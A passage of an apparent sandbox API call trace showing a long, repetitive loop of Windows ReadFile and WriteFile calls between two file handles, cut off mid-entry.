WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x322, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.692] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.693] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x363, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.693] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.694] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3aa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.694] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.694] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x396, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.695] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.696] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.696] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.696] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.697] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x21d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.697] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.698] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.698] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.699] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.700] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.700] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1c5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.701] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.701] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.702] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x131, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.702] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.703] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.703] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.704] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x20a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.704] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.705] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.705] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.706] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.706] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.707] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x156, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.707] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.708] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.708] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x252, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.709] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.709] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.710] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x72, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.710] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.711] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.711] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.712] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.712] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.713] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x75, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.713] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.714] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.714] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.715] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.715] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.716] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.716] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.717] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.717] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.718] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.718] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.719] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.719] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.720] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.720] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.721] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.721] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.722] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.722] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.723] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.723] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.723] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.724] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.724] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.725] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.725] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.726] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.726] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.727] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.727] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.728] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.728] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.729] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.729] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.730] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.730] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.730] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.731] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.731] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.732] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.732] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.733] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.734] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.734] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.734] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.735] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.735] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.736] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.736] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.737] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.737] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.738] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.738] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.739] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.739] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.740] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.740] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, 